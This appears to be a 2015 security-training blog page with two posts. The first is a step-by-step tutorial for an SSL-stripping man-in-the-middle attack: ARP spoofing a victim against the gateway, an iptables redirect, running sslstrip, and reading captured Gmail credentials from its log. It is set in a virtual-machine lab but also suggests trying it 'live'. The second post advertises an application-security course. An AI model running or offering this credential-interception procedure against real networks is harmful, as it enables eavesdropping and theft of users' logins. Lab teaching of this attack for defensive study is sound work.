Wednesday, 23 September 2015

SSLStriping

Let us set two virtual machines, on one machine we run Windows XP (victim) and on the other machine we run Kali (Attacker). 

Before we actually target the victim machine using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. 

We try to follow step by step method to do so :

Please note ip address of both machines and they should be kept on NAT network.

From step 1 to 4 give all commands should be given in Kali on terminal.

1. Setting up IP Forwarding: (Use in Kali)

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim (Windows XP ) and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1 

3. Setting up port redirection using Iptables from port 80 to port 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

sslstrip –l 10000


5. In Windows Xp login to gmail and enter the credential. (Observe that any https site is changed to http)

6. To check in Kali give the command

Cat sslstrip.log


7. We can see the credential in sslstrip.log file.

WOW !! AMAZING..... if you want to try live you can use bootable kali.

Hope you enjoyed sslstrip with kali...


By GEETA SINGH
Posted by at No comments:

Friday, 21 August 2015

CAST-613 Advanced Application Security from EC-Council

CAST-613 is a well known Global certification from EC-Council.

Hardening your own Corporate Web App/Web Site

We normally focus and secure all the devices connected in our network.
We continously monitor the traffic generated in/out of the network and try doing regular VA /PT by auditing and patching the vulnerability.

BUT we forget to pay attention towards Application-level attacks.
It is necessary that we secure our Application and provide secure code and make tough for hackers to get inside the Application.
This will enable us to protect our information present in the database which should not be exposed.

So here comes CAST-613 Advance Application Security course in India.
QUIK is the first Institute to take initiative to create more awareness and do hard code manual testing Vs. Automated testing and path towards the secure data by providing good education.

CAST-613 is different because we have 3 sites hosted on Amazon
One is Vulnerable site , Second is Secure site and third is attacker site.
WOW........Until unless you do the labs .....U cannot feel it.

OWASP TOP 10 and TOP 25 ERRORS are very important to map with PCI-DSS controls.
 
Introducing the vulnerable website, monitoring and composing requests using a common proxy like Fiddler, Paros or Burp Suite. Modifying requests and responses in Fiddler to change what goes out and what comes in before Browser Renders it.

We need to understand XSS,SQL inj ,CSRF , Clickjacking attacks which makes hacker very easy to spoil the site and insert malicious code.

So. BE SECURE......SECURE CODE.

HOPE YOU ALL ENJOY READING.........This is my first Blog on demand of my students and will keep writing on lots of topics.

Thanks all to my students who have encouraged me for writing....


Geeta Singh

Posted by at No comments:
Subscribe to: Posts (Atom)